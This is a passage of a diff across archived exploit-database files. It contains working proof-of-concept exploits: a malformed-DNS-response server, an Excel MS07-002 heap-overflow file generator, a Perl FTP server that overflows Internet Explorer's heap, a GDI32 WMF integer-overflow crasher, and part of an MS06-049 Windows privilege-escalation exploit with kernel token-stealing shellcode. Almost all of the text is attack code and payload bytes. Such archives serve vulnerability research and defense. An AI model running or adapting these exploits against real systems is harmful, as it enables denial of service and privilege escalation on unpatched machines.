-               self.response += '\x00\x01' #Authority RR
+               self.response += '\x00\x01' #Authority RR
-               self.response += '\x00\x00' #Additional RR
+               self.response += '\x00\x00' #Additional RR
-
+
-               #QUERIES
+               #QUERIES
-               #self.response += sName
+               #self.response += sName
-               self.response += '\x04\x74\x65\x73\x74\x07\x68\x61\x63\x6b\x65'
+               self.response += '\x04\x74\x65\x73\x74\x07\x68\x61\x63\x6b\x65'
-               self.response += '\x72\x73\x03\x63\x6f\x6d\x00'
+               self.response += '\x72\x73\x03\x63\x6f\x6d\x00'
-               self.response += '\x00\xff' #request all  records
+               self.response += '\x00\xff' #request all  records
-               self.response += '\x00\x01' #inet class
+               self.response += '\x00\x01' #inet class
-
+
-               #ANSWERS
+               #ANSWERS
-               #A record
+               #A record
-               self.response += '\xc0\x0c\x00\x01\x00\x01\x00\x00\x00\x07'
+               self.response += '\xc0\x0c\x00\x01\x00\x01\x00\x00\x00\x07'
-               self.response += '\x00\x04\xc0\xa8\x00\x02' #A type record (IP add)
+               self.response += '\x00\x04\xc0\xa8\x00\x02' #A type record (IP add)
-               #TXT record
+               #TXT record
-               self.response += '\xc0\x0c\x00\x10\x00\x01\x00\x00\x00\x07'
+               self.response += '\xc0\x0c\x00\x10\x00\x01\x00\x00\x00\x07'
-               self.response += '\x00\x18' #TXT record length
+               self.response += '\x00\x18' #TXT record length
-               self.response += '\x08\x50\x52\x4f\x54\x4f\x43\x4f\x4c'
+               self.response += '\x08\x50\x52\x4f\x54\x4f\x43\x4f\x4c'
-               self.response += '\x00' #Zero length TXT RDATA
+               self.response += '\x00' #Zero length TXT RDATA
-               self.response += '\x00' #Zero length TXT RDATA
+               self.response += '\x00' #Zero length TXT RDATA
-               self.response += '\x08\x50\x52\x4f\x54\x4f\x43\x4f\x4c'
+               self.response += '\x08\x50\x52\x4f\x54\x4f\x43\x4f\x4c'
-               self.response += '\x00' #Zero length TXT RDATA
+               self.response += '\x00' #Zero length TXT RDATA
-               self.response += '\x00' #Zero length TXT RDATA
+               self.response += '\x00' #Zero length TXT RDATA
-               self.response += '\x01\x41'
+               self.response += '\x01\x41'
-
+
-               #Authoritative Nameservers
+               #Authoritative Nameservers
-               self.response += '\xc0\x11\x00\x02\x00\x01\x00\x01\x51\x80'
+               self.response += '\xc0\x11\x00\x02\x00\x01\x00\x01\x51\x80'
-               self.response += '\x00\x0b\x08\x73\x63\x6f\x72\x70\x69\x6f'
+               self.response += '\x00\x0b\x08\x73\x63\x6f\x72\x70\x69\x6f'
-               self.response += '\x6e\xc0\x11'
+               self.response += '\x6e\xc0\x11'
-
+
-               self.DNSsocket.sendto(self.response, (self.Addr))
+               self.DNSsocket.sendto(self.response, (self.Addr))
-
+
-if __name__ == '__main__':
+if __name__ == '__main__':
-       try:
+       try:
-               localhost = sys.argv[1]
+               localhost = sys.argv[1]
-       except IndexError:
+       except IndexError:
-               print 'Usage: %s <local ip for listening to DNS request>' % sys.argv[0]
+               print 'Usage: %s <local ip for listening to DNS request>' % sys.argv[0]
-               sys.exit(-1)
+               sys.exit(-1)
-
+
-       D = DNSserver(localhost)
+       D = DNSserver(localhost)
-
+
-# milw0rm.com [2006-12-09]
+# milw0rm.com [2006-12-09]
--- a/platforms/windows/dos/3193.py
+++ b/platforms/windows/dos/3193.py
@ -1,101 +1,101 @@
-"""
+"""
-MS07-002 EXCEL Malformed Palette Record Vulnerability DOS POC
+MS07-002 EXCEL Malformed Palette Record Vulnerability DOS POC
-
+
-######
+######
-Author
+Author
-######
+######
-LifeAsaGeek at gmail.com
+LifeAsaGeek at gmail.com
-... and Microsoft said that vuln credit is for Greg MacManus of iDefense Labs
+... and Microsoft said that vuln credit is for Greg MacManus of iDefense Labs
-
+
-########################
+########################
-Vulnerablity Description
+Vulnerablity Description
-########################
+########################
-Bound error occurs when parsing Palette Record and it causes Heap Overflow
+Bound error occurs when parsing Palette Record and it causes Heap Overflow
-check out here - http://picasaweb.google.com/lifeasageek/MS07002/photo?pli=1#5022146178204021506
+check out here - http://picasaweb.google.com/lifeasageek/MS07002/photo?pli=1#5022146178204021506
-   which is generated by DarunGrim
+   which is generated by DarunGrim
-   ( and I want to say I'm not a person who made this analyzer ==; )
+   ( and I want to say I'm not a person who made this analyzer ==; )
-
+
-#############
+#############
-Attack Vector
+Attack Vector
-#############
+#############
-Arbitary Data will be overwritten to the heap, but arbitary data is highly depends on the stack status !
+Arbitary Data will be overwritten to the heap, but arbitary data is highly depends on the stack status !
-Result of heap overflow, you can overwrite 2 bytes to restricted range address ( not anywhere )
+Result of heap overflow, you can overwrite 2 bytes to restricted range address ( not anywhere )
-In *CERTAIN* environment( such as open excel file which is already opened)
+In *CERTAIN* environment( such as open excel file which is already opened)
-    you can catch the flow by modify function pointer, but it doesn't have a reliablity at all
+    you can catch the flow by modify function pointer, but it doesn't have a reliablity at all
-Let me know if you have a good method to break down
+Let me know if you have a good method to break down
-
+
-######
+######
-Result
+Result
-######
+######
-DOS
+DOS
-
+
-#####
+#####
-Notes
+Notes
-#####
+#####
-You should modify pyExcelerator module because it doesn't generate Palette Record
+You should modify pyExcelerator module because it doesn't generate Palette Record
-
+
-pyExcelerator diff results would be like below
+pyExcelerator diff results would be like below
-
+
-diff h:\study\pyexcelerator-0.6.3a\pyExcelerator-0.6.3a\build\lib\pyExcelerator\BIFFRecords.py pyExcelerator\BIFFRecords.py
+diff h:\study\pyexcelerator-0.6.3a\pyExcelerator-0.6.3a\build\lib\pyExcelerator\BIFFRecords.py pyExcelerator\BIFFRecords.py
-1104a1105,1108
+1104a1105,1108
->     def __init__(self):
+>     def __init__(self):
->         BiffRecord.__init__(self)
+>         BiffRecord.__init__(self)
->         self._rec_data = pack('<H', 0x0038) # number of colours
+>         self._rec_data = pack('<H', 0x0038) # number of colours
->         self._rec_data += 'A' * 0xe0
+>         self._rec_data += 'A' * 0xe0
-diff h:\study\pyexcelerator-0.6.3a\pyExcelerator-0.6.3a\build\lib\pyExcelerator\Workbook.py pyExcelerator\Workbook.py
+diff h:\study\pyexcelerator-0.6.3a\pyExcelerator-0.6.3a\build\lib\pyExcelerator\Workbook.py pyExcelerator\Workbook.py
-468,469c468
+468,469c468
-<         result = ''
+<         result = ''
-<         return result
+<         return result
---
+---
->         return BIFFRecords.PaletteRecord().get()
+>         return BIFFRecords.PaletteRecord().get()
-
+
-!! THIS IS ONLY FOR EDUCATIONAL PURPOSE !!
+!! THIS IS ONLY FOR EDUCATIONAL PURPOSE !!
- - 2007.01.25
+ - 2007.01.25
-"""
+"""
-
+
-import sys, os
+import sys, os
-from struct import *
+from struct import *
-from pyExcelerator import *
+from pyExcelerator import *
-
+
-def CreateXLS():
+def CreateXLS():
-    w = Workbook()
+    w = Workbook()
-    ws = w.add_sheet('MS07-002 POC')
+    ws = w.add_sheet('MS07-002 POC')
-    w.save( "before.xls")
+    w.save( "before.xls")
-
+
-
+
-def ModifyXLS():
+def ModifyXLS():
-    try:
+    try:
-        f = open( "before.xls", "rb")
+        f = open( "before.xls", "rb")
-    except:
+    except:
-     print "File Open Error ! "
+     print "File Open Error ! "
-     sys.exit(0)
+     sys.exit(0)
-
+
-    str = f.read()
+    str = f.read()
-    f.close()
+    f.close()
-
+
-    #write to malformed xls file
+    #write to malformed xls file
-    f = open( "after.xls", "wb")
+    f = open( "after.xls", "wb")
-
+
-    PaletteRecord = pack( "<HHH", 0x0092, 0x00E2, 0x0038)
+    PaletteRecord = pack( "<HHH", 0x0092, 0x00E2, 0x0038)
-    NewPaletteRecord = pack( "<HHH", 0x0092, 0x00E2, 0x01FF)
+    NewPaletteRecord = pack( "<HHH", 0x0092, 0x00E2, 0x01FF)
-
+
-    palette_idx = str.find( PaletteRecord)
+    palette_idx = str.find( PaletteRecord)
-
+
-    if palette_idx == -1:
+    if palette_idx == -1:
-     print "Cannot find Palette Record"
+     print "Cannot find Palette Record"
-     sys.exit(0)
+     sys.exit(0)
-
+
-    str = str.replace( PaletteRecord, NewPaletteRecord)
+    str = str.replace( PaletteRecord, NewPaletteRecord)
-    f.write( str)
+    f.write( str)
-    f.close()
+    f.close()
-
+
-if __name__ == "__main__":
+if __name__ == "__main__":
-    print "==========================================================="
+    print "==========================================================="
-    print "MS07-002 Malformed Palette Record vulnerability DOS POC "
+    print "MS07-002 Malformed Palette Record vulnerability DOS POC "
-    print "Create POC Excel File after.xls"
+    print "Create POC Excel File after.xls"
-    print "by LifeAsaGeek at gmail.com"
+    print "by LifeAsaGeek at gmail.com"
-    print "==========================================================="
+    print "==========================================================="
-    CreateXLS()
+    CreateXLS()
-    ModifyXLS() 
+    ModifyXLS() 
-
+
-# milw0rm.com [2007-01-25]
+# milw0rm.com [2007-01-25]
--- a/platforms/windows/dos/33860.html
+++ b/platforms/windows/dos/33860.html
@ -13,9 +13,9 @@ CVE : unknown
 <body>
 <form id="testfm">
-<textarea id="child" value="a1" ></textarea>
+<textarea id="child" value="a1" >&lt;/textarea&gt;
 <input id="child2" type="checkbox" name="option2" value="a2">Test check<Br>
-<textarea id="child3" value="a2" ></textarea>
+<textarea id="child3" value="a2" >&lt;/textarea&gt;
 <input type="text" name="test1">
 </form>
--- a/platforms/windows/dos/3444.pl
+++ b/platforms/windows/dos/3444.pl
@ -1,42 +1,42 @@
-#!/usr/bin/perl
+#!/usr/bin/perl
-
+
-# MS 07-016 FTP Server Response PoC
+# MS 07-016 FTP Server Response PoC
-# Usage: ./ms07016ftp.pl [LISTEN_IP]
+# Usage: ./ms07016ftp.pl [LISTEN_IP]
-#
+#
-# Tested Against: MSIE 6.02900.2180 (SP2)
+# Tested Against: MSIE 6.02900.2180 (SP2)
-#
+#
-# Details: The response is broken into buffers, either at length 1024,
+# Details: The response is broken into buffers, either at length 1024,
-#                  or at '\r\n'. Each buffer is apended with \x00, without
+#                  or at '\r\n'. Each buffer is apended with \x00, without
-#                  bounds checking.  If the response is exctly 1024 characters
+#                  bounds checking.  If the response is exctly 1024 characters
-#                  in length, you will overflow the heap with the string \x00.
+#                  in length, you will overflow the heap with the string \x00.
-
+
-
+
-use IO::Socket;
+use IO::Socket;
-use strict;
+use strict;
-
+
-# Create listener
+# Create listener
-my $ip=shift || '127.0.0.1';
+my $ip=shift || '127.0.0.1';
-my $sock = IO::Socket::INET->new(Listen=>1,
+my $sock = IO::Socket::INET->new(Listen=>1,
-                                 LocalHost=>$ip,
+                                 LocalHost=>$ip,
-                                                     LocalPort=>'21',
+                                                     LocalPort=>'21',
-                                                             Proto=>'tcp');
+                                                             Proto=>'tcp');
-$sock or die ("Could not create listener.\nMake sure no FTP server is running, and you are running this as root.\n");
+$sock or die ("Could not create listener.\nMake sure no FTP server is running, and you are running this as root.\n");
-
+
-# Wait for initial connection and send banner
+# Wait for initial connection and send banner
-my $sock_in = $sock->accept();
+my $sock_in = $sock->accept();
-print $sock_in "220 waa waa wee waa\r\n";
+print $sock_in "220 waa waa wee waa\r\n";
-
+
-# Send response code with total lenght of response = 1024
+# Send response code with total lenght of response = 1024
-while (<$sock_in>){
+while (<$sock_in>){
-       my $response;
+       my $response;
-       if($_ eq "USER") { $response="331 ";}
+       if($_ eq "USER") { $response="331 ";}
-       elsif($_ eq "PASS") { $response="230 ";}
+       elsif($_ eq "PASS") { $response="230 ";}
-       elsif($_ eq "syst") { $response="215 ";}
+       elsif($_ eq "syst") { $response="215 ";}
-       elsif($_ eq "CWD") { $response="250 ";}
+       elsif($_ eq "CWD") { $response="250 ";}
-       elsif($_ eq "PWD") { $response="230 ";}
+       elsif($_ eq "PWD") { $response="230 ";}
-       else { $response="200 ";}
+       else { $response="200 ";}
-       print $sock_in $response."A"x(1024-length($response)-2)."\r\n";
+       print $sock_in $response."A"x(1024-length($response)-2)."\r\n";
-}
+}
-close($sock);
+close($sock);
-
+
-# milw0rm.com [2007-03-09]
+# milw0rm.com [2007-03-09]
--- a/platforms/windows/dos/4337.c
+++ b/platforms/windows/dos/4337.c
@ -1,63 +1,63 @@
-/*
+/*
- * MS07-046(GDI32.dll Integer overflow DOS) Proof Of Concept Code
+ * MS07-046(GDI32.dll Integer overflow DOS) Proof Of Concept Code
- 
+ 
- * by Hong Gil-Dong & Chun Woo-Chi
+ * by Hong Gil-Dong & Chun Woo-Chi
-
+
- * Yang yeon(?~1542), Korea
+ * Yang yeon(?~1542), Korea
- * "I shall keep clenching my left fist unitl i see the real tao".
+ * "I shall keep clenching my left fist unitl i see the real tao".
-
+
- * This POC is only for test. If an application read a malformed wmf 
+ * This POC is only for test. If an application read a malformed wmf 
- * file like this POC, the application will be crashed. If you apply 
+ * file like this POC, the application will be crashed. If you apply 
- * this code, you can execute an arbitrary code.
+ * this code, you can execute an arbitrary code.
- *
+ *
-
+
- * We tested this code on Windows XP SP2 Korean Edition 
+ * We tested this code on Windows XP SP2 Korean Edition 
- * (GDI32.dll version 5.1.2600.3099). But it will work well on other
+ * (GDI32.dll version 5.1.2600.3099). But it will work well on other
- * systems.
+ * systems.
- */
+ */
-
+
-#include <stdio.h>
+#include <stdio.h>
-#include <windows.h>
+#include <windows.h>
-
+
-#define WMF_FILE "ms07-046.wmf"
+#define WMF_FILE "ms07-046.wmf"
-
+
-void usage(void);
+void usage(void);
-
+
-int main()
+int main()
-{
+{
-	
+	
-	FILE *fp;
+	FILE *fp;
-
+
-	char wmf[] = "\x01\x00\x09\x00\x00\x03\x11\x00\x00\x00\x00\x00"\
+	char wmf[] = "\x01\x00\x09\x00\x00\x03\x11\x00\x00\x00\x00\x00"\
-                 "\x05\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF\x13\x02"\
+                 "\x05\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF\x13\x02"\
-                 "\x32\x00\x96\x00\x03\x00\x00\x00\x00\x00";
+                 "\x32\x00\x96\x00\x03\x00\x00\x00\x00\x00";
-	int i;
+	int i;
-	
+	
-	HMETAFILE srcMeta;
+	HMETAFILE srcMeta;
-
+
-    usage();
+    usage();
-
+
-	if ((fp = fopen(WMF_FILE, "w")) == NULL) {
+	if ((fp = fopen(WMF_FILE, "w")) == NULL) {
-                printf("File %s write error\n", WMF_FILE);
+                printf("File %s write error\n", WMF_FILE);
-                return 0;
+                return 0;
-	}
+	}
-
+
-	for(i=0; i<sizeof(wmf)-1; i++)
+	for(i=0; i<sizeof(wmf)-1; i++)
-		fputc(wmf[i], fp);
+		fputc(wmf[i], fp);
-
+
-	fclose(fp);
+	fclose(fp);
-
+
-    srcMeta = GetMetaFile(WMF_FILE);
+    srcMeta = GetMetaFile(WMF_FILE);
-    CopyMetaFile( srcMeta, NULL);
+    CopyMetaFile( srcMeta, NULL);
-
+
-    return 0;
+    return 0;
-}
+}
-
+
-void usage(void) 
+void usage(void) 
-{
+{
-   printf("MS07-046 Windows Meta File RecordParms Integer Overflow \n");
+   printf("MS07-046 Windows Meta File RecordParms Integer Overflow \n");
-   printf("Proof of Concept by Hong Gil-Dong & Chun Woo-Chi \n");
+   printf("Proof of Concept by Hong Gil-Dong & Chun Woo-Chi \n");
-      
+      
-}
+}
-
+
-// milw0rm.com [2007-08-29]
+// milw0rm.com [2007-08-29]
--- a/platforms/windows/local/2412.c
+++ b/platforms/windows/local/2412.c
@ -1,368 +1,368 @@
-/*
+/*
-    MS06-049 Windows ZwQuerySystemInformation Local Privilege Escalation Vulnerability Exploit
+    MS06-049 Windows ZwQuerySystemInformation Local Privilege Escalation Vulnerability Exploit
-            Created by SoBeIt
+            Created by SoBeIt
-
+
-    Main file of exploit
+    Main file of exploit
-
+
-    Tested on:
+    Tested on:
-
+
-    Windows 2000 PRO SP4 Chinese
+    Windows 2000 PRO SP4 Chinese
-    Windows 2000 PRO SP4 Rollup 1 Chinese
+    Windows 2000 PRO SP4 Rollup 1 Chinese
-    Windows 2000 PRO SP4 English
+    Windows 2000 PRO SP4 English
-    Windows 2000 PRO SP4 Rollup 1 English
+    Windows 2000 PRO SP4 Rollup 1 English
-
+
-    Usage:ms06-049.exe
+    Usage:ms06-049.exe
-*/
+*/
-
+
-#include <windows.h>
+#include <windows.h>
-#include <stdio.h>
+#include <stdio.h>
-
+
-#define NTSTATUS    int
+#define NTSTATUS    int
-#define ProcessBasicInformation    0
+#define ProcessBasicInformation    0
-#define SystemModuleInformation 11
+#define SystemModuleInformation 11
-    
+    
-typedef NTSTATUS (NTAPI *ZWVDMCONTROL)(ULONG, PVOID);
+typedef NTSTATUS (NTAPI *ZWVDMCONTROL)(ULONG, PVOID);
-typedef NTSTATUS (NTAPI *ZWQUERYINFORMATIONPROCESS)(HANDLE, ULONG, PVOID, ULONG, PULONG);
+typedef NTSTATUS (NTAPI *ZWQUERYINFORMATIONPROCESS)(HANDLE, ULONG, PVOID, ULONG, PULONG);
-typedef NTSTATUS (NTAPI *ZWQUERYSYSTEMINFORMATION)(ULONG, PVOID, ULONG, PULONG);
+typedef NTSTATUS (NTAPI *ZWQUERYSYSTEMINFORMATION)(ULONG, PVOID, ULONG, PULONG);
-
+
-ZWVDMCONTROL    ZwVdmControl;
+ZWVDMCONTROL    ZwVdmControl;
-ZWQUERYINFORMATIONPROCESS    ZwQueryInformationProcess;
+ZWQUERYINFORMATIONPROCESS    ZwQueryInformationProcess;
-ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation;
+ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation;
-
+
-typedef struct _PROCESS_BASIC_INFORMATION {
+typedef struct _PROCESS_BASIC_INFORMATION {
-      NTSTATUS ExitStatus;
+      NTSTATUS ExitStatus;
-      PVOID PebBaseAddress;
+      PVOID PebBaseAddress;
-      ULONG AffinityMask;
+      ULONG AffinityMask;
-      ULONG BasePriority;
+      ULONG BasePriority;
-      ULONG UniqueProcessId;
+      ULONG UniqueProcessId;
-      ULONG InheritedFromUniqueProcessId;
+      ULONG InheritedFromUniqueProcessId;
-} PROCESS_BASIC_INFORMATION, *PPROCESS_BASIC_INFORMATION;
+} PROCESS_BASIC_INFORMATION, *PPROCESS_BASIC_INFORMATION;
-
+
-typedef struct _SYSTEM_MODULE_INFORMATION {
+typedef struct _SYSTEM_MODULE_INFORMATION {
-    ULONG Reserved[2];
+    ULONG Reserved[2];
-    PVOID Base;
+    PVOID Base;
-    ULONG Size;
+    ULONG Size;
-    ULONG Flags;
+    ULONG Flags;
-    USHORT Index;
+    USHORT Index;
-    USHORT Unknow;
+    USHORT Unknow;
-    USHORT LoadCount;
+    USHORT LoadCount;
-    USHORT ModuleNameOffset;
+    USHORT ModuleNameOffset;
-    char ImageName[256];    
+    char ImageName[256];    
-} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
+} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
-
+
-unsigned char kfunctions[64][64] = 
+unsigned char kfunctions[64][64] = 
-{
+{
-                            //ntoskrnl.exe
+                            //ntoskrnl.exe
-    {"ZwTerminateProcess"},
+    {"ZwTerminateProcess"},
-    {""},
+    {""},
-};
+};
-
+
-unsigned char shellcode[] = 
+unsigned char shellcode[] = 
-        "\x90\x60\x9c\xe9\xd1\x00\x00\x00\x5f\x4f\x47\x33\xc0\x66\x81\x3f"
+        "\x90\x60\x9c\xe9\xd1\x00\x00\x00\x5f\x4f\x47\x33\xc0\x66\x81\x3f"
-        "\x90\xcc\x75\xf6\x40\x40\x66\x81\x3c\x07\xcc\x90\x75\xec\x83\xc7"
+        "\x90\xcc\x75\xf6\x40\x40\x66\x81\x3c\x07\xcc\x90\x75\xec\x83\xc7"
-        "\x04\xbe\x38\xf0\xdf\xff\x8b\x36\xad\xad\x48\x81\x38\x4d\x5a\x90"
+        "\x04\xbe\x38\xf0\xdf\xff\x8b\x36\xad\xad\x48\x81\x38\x4d\x5a\x90"
-        "\x00\x75\xf7\x95\x8b\xf7\x6a\x01\x59\xe8\x56\x00\x00\x00\xe2\xf9"
+        "\x00\x75\xf7\x95\x8b\xf7\x6a\x01\x59\xe8\x56\x00\x00\x00\xe2\xf9"
-        "\xbb\x24\xf1\xdf\xff\x8b\x1b\x8b\x43\x44\xb9\x08\x00\x00\x00\xe8"
+        "\xbb\x24\xf1\xdf\xff\x8b\x1b\x8b\x43\x44\xb9\x08\x00\x00\x00\xe8"
-        "\x2c\x00\x00\x00\x8b\xd0\x8b\x4e\x04\xe8\x22\x00\x00\x00\x8b\x8a"
+        "\x2c\x00\x00\x00\x8b\xd0\x8b\x4e\x04\xe8\x22\x00\x00\x00\x8b\x8a"
-        "\x2c\x01\x00\x00\x89\x88\x2c\x01\x00\x00\x56\x8b\x7e\x0c\x8b\x4e"
+        "\x2c\x01\x00\x00\x89\x88\x2c\x01\x00\x00\x56\x8b\x7e\x0c\x8b\x4e"
-        "\x10\x8b\x76\x08\xf3\xa4\x5e\x33\xc0\x50\x50\xff\x16\x9d\x61\xc3"
+        "\x10\x8b\x76\x08\xf3\xa4\x5e\x33\xc0\x50\x50\xff\x16\x9d\x61\xc3"
-        "\x8b\x80\xa0\x00\x00\x00\x2d\xa0\x00\x00\x00\x39\x88\x9c\x00\x00"
+        "\x8b\x80\xa0\x00\x00\x00\x2d\xa0\x00\x00\x00\x39\x88\x9c\x00\x00"
-        "\x00\x75\xed\xc3\x51\x56\x8b\x75\x3c\x8b\x74\x2e\x78\x03\xf5\x56"
+        "\x00\x75\xed\xc3\x51\x56\x8b\x75\x3c\x8b\x74\x2e\x78\x03\xf5\x56"
-        "\x8b\x76\x20\x03\xf5\x33\xc9\x49\x41\xad\x03\xc5\x33\xdb\x0f\xbe"
+        "\x8b\x76\x20\x03\xf5\x33\xc9\x49\x41\xad\x03\xc5\x33\xdb\x0f\xbe"
-        "\x10\x85\xd2\x74\x08\xc1\xcb\x07\x03\xda\x40\xeb\xf1\x3b\x1f\x75"
+        "\x10\x85\xd2\x74\x08\xc1\xcb\x07\x03\xda\x40\xeb\xf1\x3b\x1f\x75"
-        "\xe7\x5e\x8b\x5e\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5e\x1c\x03\xdd"
+        "\xe7\x5e\x8b\x5e\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5e\x1c\x03\xdd"
-        "\x8b\x04\x8b\x03\xc5\xab\x5e\x59\xc3\xe8\x2a\xff\xff\xff\x90\x90"
+        "\x8b\x04\x8b\x03\xc5\xab\x5e\x59\xc3\xe8\x2a\xff\xff\xff\x90\x90"
-
+
-        "\x90\xcc\xcc\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+        "\x90\xcc\xcc\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
-        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xcc\x90\x90\xcc";
+        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xcc\x90\x90\xcc";
-
+
-void ErrorQuit(char *msg)
+void ErrorQuit(char *msg)
-{
+{
-    printf("%s:%x\n", msg, GetLastError());
+    printf("%s:%x\n", msg, GetLastError());
-    ExitProcess(0);
+    ExitProcess(0);
-}
+}
-
+
-ULONG ComputeHash(char *ch)
+ULONG ComputeHash(char *ch)
-{
+{
-    ULONG ret = 0;
+    ULONG ret = 0;
-
+
-    while(*ch)
+    while(*ch)
-    {
+    {
-        ret = ((ret << 25) | (ret >> 7)) + *ch++;
+        ret = ((ret << 25) | (ret >> 7)) + *ch++;
-    }
+    }
-
+
-    return ret;
+    return ret;
-}
+}
-
+
-ULONG RVA2Offset(ULONG RVA, PIMAGE_SECTION_HEADER pSectionHeader, ULONG Sections)
+ULONG RVA2Offset(ULONG RVA, PIMAGE_SECTION_HEADER pSectionHeader, ULONG Sections)
-{    
+{    
-    ULONG i;
+    ULONG i;
-    
+    
-    if(RVA < pSectionHeader[0].PointerToRawData)
+    if(RVA < pSectionHeader[0].PointerToRawData)
-        return RVA;
+        return RVA;
-
+
-    for(i = 0; i < Sections; i++)
+    for(i = 0; i < Sections; i++)
-    {   
+    {   
-        if(RVA >= pSectionHeader[i].VirtualAddress &&
+        if(RVA >= pSectionHeader[i].VirtualAddress &&
-           RVA < pSectionHeader[i].VirtualAddress + pSectionHeader[i].SizeOfRawData)           
+           RVA < pSectionHeader[i].VirtualAddress + pSectionHeader[i].SizeOfRawData)           
-           return (RVA - pSectionHeader[i].VirtualAddress + pSectionHeader[i].PointerToRawData);
+           return (RVA - pSectionHeader[i].VirtualAddress + pSectionHeader[i].PointerToRawData);
-    }
+    }
-    
+    
-    return 0;
+    return 0;
-}
+}
-
+
-ULONG Offset2RVA(ULONG Offset, PIMAGE_SECTION_HEADER pSectionHeader, ULONG Sections)
+ULONG Offset2RVA(ULONG Offset, PIMAGE_SECTION_HEADER pSectionHeader, ULONG Sections)
-{   
+{   
-    ULONG i;
+    ULONG i;
-    
+    
-    if(Offset < pSectionHeader[0].PointerToRawData)
+    if(Offset < pSectionHeader[0].PointerToRawData)
-        return Offset;
+        return Offset;
-    
+    
-    for(i = 0; i < Sections; i++)
+    for(i = 0; i < Sections; i++)
-    {
+    {
-        if(Offset >= pSectionHeader[i].PointerToRawData &&
+        if(Offset >= pSectionHeader[i].PointerToRawData &&
-           Offset < pSectionHeader[i].PointerToRawData + pSectionHeader[i].SizeOfRawData)
+           Offset < pSectionHeader[i].PointerToRawData + pSectionHeader[i].SizeOfRawData)
-           return (Offset - pSectionHeader[i].PointerToRawData + pSectionHeader[i].VirtualAddress);
+           return (Offset - pSectionHeader[i].PointerToRawData + pSectionHeader[i].VirtualAddress);
-    }
+    }
-    
+    
-    return 0;
+    return 0;
-}
+}
-
+
-void GetFunction()
+void GetFunction()
-{
+{
-    HANDLE    hNtdll;
+    HANDLE    hNtdll;
-    
+    
-    hNtdll = LoadLibrary("ntdll.dll");
+    hNtdll = LoadLibrary("ntdll.dll");
-    if(hNtdll == NULL)
+    if(hNtdll == NULL)
-        ErrorQuit("LoadLibrary failed.\n");
+        ErrorQuit("LoadLibrary failed.\n");
-        
+        
-    ZwVdmControl = (ZWVDMCONTROL)GetProcAddress(hNtdll, "ZwVdmControl");
+    ZwVdmControl = (ZWVDMCONTROL)GetProcAddress(hNtdll, "ZwVdmControl");
-    if(ZwVdmControl == NULL)
+    if(ZwVdmControl == NULL)
-        ErrorQuit("GetProcAddress failed.\n");
+        ErrorQuit("GetProcAddress failed.\n");
-        
+        
-    ZwQueryInformationProcess = (ZWQUERYINFORMATIONPROCESS)GetProcAddress(hNtdll, "ZwQueryInformationProcess");
+    ZwQueryInformationProcess = (ZWQUERYINFORMATIONPROCESS)GetProcAddress(hNtdll, "ZwQueryInformationProcess");
-    if(ZwQueryInformationProcess == NULL)
+    if(ZwQueryInformationProcess == NULL)
-        ErrorQuit("GetProcAddress failed.\n");
+        ErrorQuit("GetProcAddress failed.\n");
-        
+        
-    ZwQuerySystemInformation = (ZWQUERYSYSTEMINFORMATION)GetProcAddress(hNtdll, "ZwQuerySystemInformation");
+    ZwQuerySystemInformation = (ZWQUERYSYSTEMINFORMATION)GetProcAddress(hNtdll, "ZwQuerySystemInformation");
-    if(ZwQuerySystemInformation == NULL)
+    if(ZwQuerySystemInformation == NULL)
-        ErrorQuit("GetProcessAddress failed.\n");
+        ErrorQuit("GetProcessAddress failed.\n");
-        
+        
-    FreeLibrary(hNtdll);
+    FreeLibrary(hNtdll);
-}
+}
-
+
-ULONG GetKernelBase()
+ULONG GetKernelBase()
-{
+{
-    ULONG    i, Byte, ModuleCount;
+    ULONG    i, Byte, ModuleCount;
-    PVOID    pBuffer;
+    PVOID    pBuffer;
-    PSYSTEM_MODULE_INFORMATION    pSystemModuleInformation;
+    PSYSTEM_MODULE_INFORMATION    pSystemModuleInformation;
-    PCHAR    pName;
+    PCHAR    pName;
-    
+    
-    ZwQuerySystemInformation(SystemModuleInformation, (PVOID)&Byte, 0, &Byte);
+    ZwQuerySystemInformation(SystemModuleInformation, (PVOID)&Byte, 0, &Byte);
-        
+        
-    if((pBuffer = malloc(Byte)) == NULL)
+    if((pBuffer = malloc(Byte)) == NULL)
-        ErrorQuit("malloc failed.\n");
+        ErrorQuit("malloc failed.\n");
-        
+        
-    if(ZwQuerySystemInformation(SystemModuleInformation, pBuffer, Byte, &Byte))
+    if(ZwQuerySystemInformation(SystemModuleInformation, pBuffer, Byte, &Byte))
-        ErrorQuit("ZwQuerySystemInformation failed\n");
+        ErrorQuit("ZwQuerySystemInformation failed\n");
-    
+    
-    ModuleCount = *(PULONG)pBuffer;
+    ModuleCount = *(PULONG)pBuffer;
-    pSystemModuleInformation = (PSYSTEM_MODULE_INFORMATION)((PUCHAR)pBuffer + sizeof(ULONG));
+    pSystemModuleInformation = (PSYSTEM_MODULE_INFORMATION)((PUCHAR)pBuffer + sizeof(ULONG));
-    for(i = 0; i < ModuleCount; i++)
+    for(i = 0; i < ModuleCount; i++)
-    {
+    {
-        if((pName = strstr(pSystemModuleInformation->ImageName, "ntoskrnl.exe")) != NULL)
+        if((pName = strstr(pSystemModuleInformation->ImageName, "ntoskrnl.exe")) != NULL)
-        {
+        {
-            free(pBuffer);    
+            free(pBuffer);    
-            return (ULONG)pSystemModuleInformation->Base;
+            return (ULONG)pSystemModuleInformation->Base;
-        }
+        }
-        
+        
-        pSystemModuleInformation++;
+        pSystemModuleInformation++;
-    }
+    }
-        
+        
-    free(pBuffer);
+    free(pBuffer);
-    return 0;
+    return 0;
-}
+}
-
+
-int main(int argc, char *argv[])
+int main(int argc, char *argv[])
-{
+{
-    PULONG    pStoreBuffer, pNamesArray, pFunctionsArray, pShellcode, pRestoreBuffer;
+    PULONG    pStoreBuffer, pNamesArray, pFunctionsArray, pShellcode, pRestoreBuffer;
-    PUCHAR    pBase;
+    PUCHAR    pBase;
-    PCHAR        pName;
+    PCHAR        pName;
